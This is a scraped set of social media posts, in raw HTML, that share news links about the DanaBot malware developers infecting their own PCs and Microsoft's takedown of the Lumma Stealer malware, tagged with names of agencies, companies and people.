Pyrzout :vm:<p>Oops: DanaBot Malware Devs Infected Their Own PCs <a href="https://krebsonsecurity.com/2025/05/oops-danabot-malware-devs-infected-their-own-pcs/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">krebsonsecurity.com/2025/05/oo</span><span class="invisible">ps-danabot-malware-devs-infected-their-own-pcs/</span></a> <a href="https://social.skynetcloud.site/tags/DefenseCriminalInvestigativeService" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DefenseCriminalInvestigativeService</span></a> <a href="https://social.skynetcloud.site/tags/ArtemAleksandrovichKalinkin" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ArtemAleksandrovichKalinkin</span></a> <a href="https://social.skynetcloud.site/tags/U" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>U</span></a>.S.DepartmentofJustice <a href="https://social.skynetcloud.site/tags/Russia" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Russia</span></a>'sWaronUkraine <a href="https://social.skynetcloud.site/tags/Ne" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Ne</span></a>'er-Do-WellNews <a href="https://social.skynetcloud.site/tags/AleksandrStepanov" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AleksandrStepanov</span></a> <a href="https://social.skynetcloud.site/tags/ALittleSunshine" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ALittleSunshine</span></a> <a href="https://social.skynetcloud.site/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://social.skynetcloud.site/tags/Flashpoint" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Flashpoint</span></a> <a href="https://social.skynetcloud.site/tags/proofpoint" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>proofpoint</span></a> <a href="https://social.skynetcloud.site/tags/microsoft" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>microsoft</span></a> <a href="https://social.skynetcloud.site/tags/teamcyrmu" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>teamcyrmu</span></a> <a href="https://social.skynetcloud.site/tags/Intel471" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Intel471</span></a> <a href="https://social.skynetcloud.site/tags/Maffiozi" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Maffiozi</span></a> <a href="https://social.skynetcloud.site/tags/DanaBot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DanaBot</span></a> <a href="https://social.skynetcloud.site/tags/JimmBee" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>JimmBee</span></a> <a href="https://social.skynetcloud.site/tags/Zscaler" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Zscaler</span></a> <a href="https://social.skynetcloud.site/tags/google" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>google</span></a> <a href="https://social.skynetcloud.site/tags/Paypal" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Paypal</span></a> <a href="https://social.skynetcloud.site/tags/Lumen" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Lumen</span></a> <a href="https://social.skynetcloud.site/tags/DCIS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DCIS</span></a> <a href="https://social.skynetcloud.site/tags/ESET" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESET</span></a> <a href="https://social.skynetcloud.site/tags/Onix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Onix</span></a> <a href="https://social.skynetcloud.site/tags/fbi" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>fbi</span></a></p>
KrebsOnSecurity RSS<p>Oops: DanaBot Malware Devs Infected Their Own PCs</p><p><a href="https://krebsonsecurity.com/2025/05/oops-danabot-malware-devs-infected-their-own-pcs/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">krebsonsecurity.com/2025/05/oo</span><span class="invisible">ps-danabot-malware-devs-infected-their-own-pcs/</span></a></p><p> <a href="https://burn.capital/tags/DefenseCriminalInvestigativeService" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DefenseCriminalInvestigativeService</span></a> <a href="https://burn.capital/tags/ArtemAleksandrovichKalinkin" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ArtemAleksandrovichKalinkin</span></a> <a href="https://burn.capital/tags/U" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>U</span></a>.S.DepartmentofJustice <a href="https://burn.capital/tags/Russia" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Russia</span></a>'sWaronUkraine <a href="https://burn.capital/tags/Ne" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Ne</span></a>'er-Do-WellNews <a href="https://burn.capital/tags/AleksandrStepanov" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AleksandrStepanov</span></a> <a href="https://burn.capital/tags/ALittleSunshine" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ALittleSunshine</span></a> <a href="https://burn.capital/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://burn.capital/tags/Flashpoint" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Flashpoint</span></a> <a href="https://burn.capital/tags/proofpoint" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>proofpoint</span></a> <a href="https://burn.capital/tags/microsoft" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>microsoft</span></a> <a href="https://burn.capital/tags/teamcyrmu" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>teamcyrmu</span></a> <a href="https://burn.capital/tags/Intel471" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Intel471</span></a> <a href="https://burn.capital/tags/Maffiozi" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Maffiozi</span></a> <a href="https://burn.capital/tags/DanaBot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DanaBot</span></a> <a href="https://burn.capital/tags/JimmBee" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>JimmBee</span></a> <a href="https://burn.capital/tags/Zscaler" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Zscaler</span></a> <a href="https://burn.capital/tags/google" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>google</span></a> <a href="https://burn.capital/tags/Paypal" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Paypal</span></a> <a href="https://burn.capital/tags/Lumen" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Lumen</span></a> <a href="https://burn.capital/tags/DCIS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DCIS</span></a> <a href="https://burn.capital/tags/ESET" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESET</span></a> <a href="https://burn.capital/tags/Onix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Onix</span></a> <a href="https://burn.capital/tags/fbi" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>fbi</span></a></p>
The Lebowski<p>Hey Crypto Fam! 🛡️ Microsoft took down Lumma Stealer, a malware stealing crypto &amp; personal data. Over 394,000 PCs infected! Stay safe out there! <a href="https://mastodon.world/tags/CryptoSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CryptoSecurity</span></a> <a href="https://mastodon.world/tags/Cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Cybersecurity</span></a> <a href="https://mastodon.world/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a></p>
ENTER.CO<p>Microsoft descubre un malware que infectó 394.000 equipos en todo el planeta, Colombia entre los países afectados <a href="https://www.enter.co/empresas/seguridad/microsoft-descubre-un-malware-que-infecto-394-000-equipos-en-todo-el-planeta-colombia-entre-los-paises-afectados/?utm_source=dlvr.it&amp;utm_medium=mastodon" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">enter.co/empresas/seguridad/mi</span><span class="invisible">crosoft-descubre-un-malware-que-infecto-394-000-equipos-en-todo-el-planeta-colombia-entre-los-paises-afectados/?utm_source=dlvr.it&amp;utm_medium=mastodon</span></a> <a href="https://mastodon.social/tags/Seguridad" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Seguridad</span></a> <a href="https://mastodon.social/tags/Lumma" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Lumma</span></a> <a href="https://mastodon.social/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a></p>